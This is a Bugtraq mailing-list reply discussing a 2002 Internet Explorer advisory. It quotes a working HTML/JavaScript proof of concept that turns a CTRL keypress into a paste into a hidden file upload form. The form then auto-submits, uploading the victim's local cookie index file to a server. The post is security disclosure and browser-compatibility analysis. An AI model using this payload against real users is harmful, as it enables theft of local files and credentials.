Bugtraq mailing list archives
Re: Pressing CTRL in IE is dangerous - Sandblad advisory #8
From: Peter Pentchev <roam () ringlet net>
Date: Wed, 24 Jul 2002 11:42:01 +0300
On Tue, Jul 23, 2002 at 09:50:30PM +0200, Andreas Sandblad wrote:
- Sandblad advisory #8 - ---..---..---..---..---..---..---..---..---..---..---..---..---- Title: Pressing CTRL in IE is dangerous Date: [2002-07-23] Software: Internet Explorer Impact: Pressing CTRL in IE may result in arbitrary local file to be uploaded to a remote server (no exact path needed). If special sensitive information is uploaded, it may be used to run remote programs.
[snip]
1. When an user presses the CTRL key an onkeydown event can be set to fire. In the event function the key pressed is changed to 'V'. The result will be a paste operation with less restrictions. 2. The content of the clipboard is altered and focus is changed to a hidden file upload form. The paste operation will be performed into the form, yielding a change of value for the file upload field (not normally allowed). 3. The upload form is submited automaticly (legal javascript operation).
[snip]
<!div id=h style="zoom:0.0001"> <!form name=u enctype="multipart/form-data" method=post action=upload.php> <!input type=file name=file></form></div> <!script> //uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat"; uploadFile="..\\Cookies\\index.dat"; function gotKey(){ if (!event.ctrlKey) return; document.onkeydown = null; event.keyCode = 86; window.clipboardData.setData("Text",uploadFile); (p=document.forms.u.file).focus(); p.onpropertychange = function(){document.forms.u.submit()}; } document.onkeydown = gotKey; window.onload=function(){document.body.focus()}; <!/script>
This was verified to work on various versions of IE 5 and 6, and also on Opera 6.01 build 1041. However, Mozilla 1.0rc1 is NOT vulnerable, partly because of a script error (the onkeypress handler should accept a parameter instead of referring to 'event' directly), and mostly because of the fact that in Mozilla, event.keyCode is not settable. G'luck, Peter -- Peter Pentchev roam () ringlet net roam () FreeBSD org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 If you think this sentence is confusing, then change one pig.
Attachment:
_bin
Description:
Current thread:
- Pressing CTRL in IE is dangerous - Sandblad advisory #8 Andreas Sandblad (Jul 23)
- RE: Pressing CTRL in IE is dangerous - Sandblad advisory #8 GreyMagic Software (Jul 24)
- Re: Pressing CTRL in IE is dangerous - Sandblad advisory #8 Peter Pentchev (Jul 24)
- <Possible follow-ups>
- RE: Pressing CTRL in IE is dangerous - Sandblad advisory #8 Thor Larholm (Jul 24)